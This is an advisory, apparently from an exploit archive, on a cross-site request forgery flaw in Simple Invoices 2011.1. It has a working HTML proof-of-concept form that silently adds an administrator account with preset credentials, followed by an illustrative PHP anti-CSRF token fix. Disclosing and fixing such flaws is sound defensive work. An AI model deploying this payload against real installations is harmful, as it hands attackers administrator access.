Simple Invoice 2011.1 Cross Site Request Forgery

Posted on 22 May 2015

# Affected software: Simple Invoices
# Type of vulnerability: adding admin user via CSRF
# URL: simpleinvoices.org
# Discovered by: provensec
# Website: provensec.com
# Version: 2011.1
# Proof of concept

<html>
<body>
  <!-- The add-user action accepts this POST with no anti-CSRF token, so a browser that is
       already logged in with user-management rights and loads this page inserts the account. -->
  <form action="http://demo.simpleinvoices.org/index.php?module=user&view=add" method="POST">
    <input type="hidden" name="email" value="aaaa@gmail.com" />
    <input type="hidden" name="role" value="1" />
    <input type="hidden" name="password_field" value="lalala123@" />
    <input type="hidden" name="enabled" value="1" />
    <input type="hidden" name="submit" value="Insert User" />
    <input type="hidden" name="op" value="insert_user" />
    <input type="submit" value="Submit request" />
  </form>
</body>
</html>
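The corresponding fix, added here as illustrative code that is not Simple Invoices' own source: the insert_user action is guarded by a per-session synchronizer token that a page on another site cannot read, with an Origin check as defence in depth. The handler layout and function names are assumptions; the POST field names follow the PoC.

```php
<?php
// Added example, not Simple Invoices' own code: the insert_user action guarded by a
// per-session anti-CSRF token. Field names follow the PoC; the handler is hypothetical.
session_start();
// Return this session's token, creating it on first use (32 random bytes, hex-encoded).
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Fail closed: missing session token, missing form token, or mismatch all reject (constant-time compare).
function csrf_valid(array $post, array $session): bool
{
    $expected  = $session['csrf_token'] ?? '';
    $submitted = $post['csrf_token'] ?? '';
    if (!is_string($expected) || $expected === '' || !is_string($submitted)) {
        return false;
    }
    return hash_equals($expected, $submitted);
}

// Defence in depth: a form submitted from another site carries that site's Origin header.
// Compare hosts only, so a port in HTTP_HOST does not break the check.
function same_origin(array $server): bool
{
    if (!isset($server['HTTP_ORIGIN'])) {
        return true;   // header absent: the token check alone decides
    }
    $originHost = parse_url($server['HTTP_ORIGIN'], PHP_URL_HOST);
    $ownHost    = parse_url('http://' . ($server['HTTP_HOST'] ?? ''), PHP_URL_HOST);
    return is_string($originHost) && is_string($ownHost) && strcasecmp($originHost, $ownHost) === 0;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['op'] ?? '') === 'insert_user') {
    if (!same_origin($_SERVER) || !csrf_valid($_POST, $_SESSION)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid anti-CSRF token');
    }
    // insert_user($_POST['email'], $_POST['role'], $_POST['password_field'], $_POST['enabled']); // hypothetical
}
?>
<!-- The application's own add-user form embeds the token; a page on another site cannot read it. -->
<form action="index.php?module=user&amp;view=add" method="POST">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>" />
  <input type="submit" name="submit" value="Insert User" />
</form>
```

With the token required, the PoC form above is rejected with 403 because it cannot supply a value that matches the victim's session.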
